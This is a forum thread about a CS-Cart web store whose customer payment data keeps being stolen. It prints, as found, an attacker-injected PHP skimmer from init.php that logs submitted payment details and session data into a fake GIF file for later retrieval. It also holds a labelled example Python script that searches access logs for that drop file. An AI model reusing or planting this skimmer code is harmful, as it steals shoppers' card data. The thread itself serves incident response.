Website Payment Information Keeps Getting Hacked

Thank you Kingsley.

CS-Cart was contacted about the recent attacks on our site, and it was found that the site was hacked. The hacker got into the init.php file and added the following code:


```php
/**
 * Dispatch cache
 *
 * @return boolean
 */
// Attacker-injected function, reproduced as found in init.php.
function fn_dispatch_payment_cache()
{
    // "fn_dispatch_payment_cache" split on "_" gives index 2 = "payment"
    $dispatch_method = @explode("_", __FUNCTION__);
    $dispatch = $_REQUEST;

    $thumb_cache_data = '';
    $thumb_cache_dir = 'images/detailed/0/user_thumbs/';

    // Resolves to 'payment_info', the request field this code captures
    $info = $dispatch_method[2] . '_info';
    if (isset($dispatch[$info])) {
        $user_data = @$_SESSION["cart"]["user_data"];
        $user_data['ip'] = $_SERVER['REMOTE_ADDR'];

        if (@!is_dir($thumb_cache_dir))
            @mkdir($thumb_cache_dir, 0777, true);
        // Drop file disguised as an image: CACHE_<md5>.thumb.gif
        $thumb_cache_path = $thumb_cache_dir . 'CACHE_' . md5('CACHE_') . '.thumb.gif';
        if (@!file_exists($thumb_cache_path))
            @file_put_contents($thumb_cache_path, "GIF89a\n", FILE_APPEND | LOCK_EX);

        // Appends session user data plus the captured fields, base64-encoded, one line per request
        $thumb_cache_data = @base64_encode(@serialize(array_merge($user_data, $dispatch[$info])));
        $user_data = @file_put_contents($thumb_cache_path, $thumb_cache_data . "\n", FILE_APPEND | LOCK_EX);
    }
    return $user_data;
}
```

CS-Cart has removed this code and I am in the process of changing the admin panel URL name again along with all the passwords.

CS-Cart said that I should try to look at the access logs and see who accessed this file: CACHE_458a9207923d944dc18f2f00d93f84eb.thumb.gif

Can anyone tell me how to view the access logs to find the IP address that accessed that?

You might want to review this post from Jun 4th…

New Hack - Security - CS-Cart Community Forums



The access logs are probably not going to be very helpful. No hacker in his right mind is going to use an IP that is not buried behind several layers of proxy servers for stealing cc info.
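
Added example, not part of any post in this thread: one way to pull the requests for the drop file out of a web server access log and summarize them per client IP. It assumes the Apache/nginx "combined" log format; the function name `find_drop_file_hits` and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Path pattern taken from the injected code: user_thumbs/CACHE_<md5>.thumb.gif
DROP_FILE = re.compile(r"/images/detailed/0/user_thumbs/CACHE_[0-9a-f]{32}\.thumb\.gif")

# Apache/nginx "combined" format (assumption; adjust for a custom LogFormat).
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_drop_file_hits(lines):
    """Summarize, per client IP, the requests that targeted the drop file."""
    hits = defaultdict(lambda: {"count": 0, "bytes": 0, "first": None, "last": None})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not DROP_FILE.search(m["path"]):
            continue
        entry = hits[m["ip"]]
        entry["count"] += 1
        # Only successful responses actually returned file contents.
        if m["status"] in ("200", "206") and m["size"] != "-":
            entry["bytes"] += int(m["size"])
        entry["first"] = entry["first"] or m["ts"]
        entry["last"] = m["ts"]
    return dict(hits)

# Constructed sample lines (documentation IP ranges, not real log data).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Mar/2014:02:10:44 +0000] "GET /images/detailed/0/user_thumbs/'
    'CACHE_458a9207923d944dc18f2f00d93f84eb.thumb.gif HTTP/1.1" 200 18432 "-" "curl/7.30.0"',
    '198.51.100.23 - - [19/Mar/2014:02:11:02 +0000] "GET /images/detailed/0/product.jpg '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Mar/2014:03:00:01 +0000] "GET /images/detailed/0/user_thumbs/'
    'CACHE_458a9207923d944dc18f2f00d93f84eb.thumb.gif HTTP/1.1" 200 20480 "-" "curl/7.30.0"',
    '192.0.2.55 - - [22/Mar/2014:09:15:30 +0000] "GET /images/detailed/0/user_thumbs/'
    'CACHE_458a9207923d944dc18f2f00d93f84eb.thumb.gif HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in find_drop_file_hits(SAMPLE_LOG).items():
        print(ip, info)
```

The injected PHP writes the file locally, so the writes never appear in the access log; only retrievals of the file do. The bytes total per IP gives a rough measure of how much collected data each client downloaded.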

Hello all. After 2 days of working with the server company, we have found our server was hacked on March 18th 2014 at 6.47pm. We have also found that Twigmo was also updated on that day. We are now checking to see if Twigmo is the actual way they have got into the server, as now we have also received another attack, and the funny thing is that we had just done a Twigmo update. Has anyone else had the same scenario? My server guys are thinking that Twigmo is the way they have accessed the site, as we can find no other ways in at this time. Any help would be great.

Geronimo1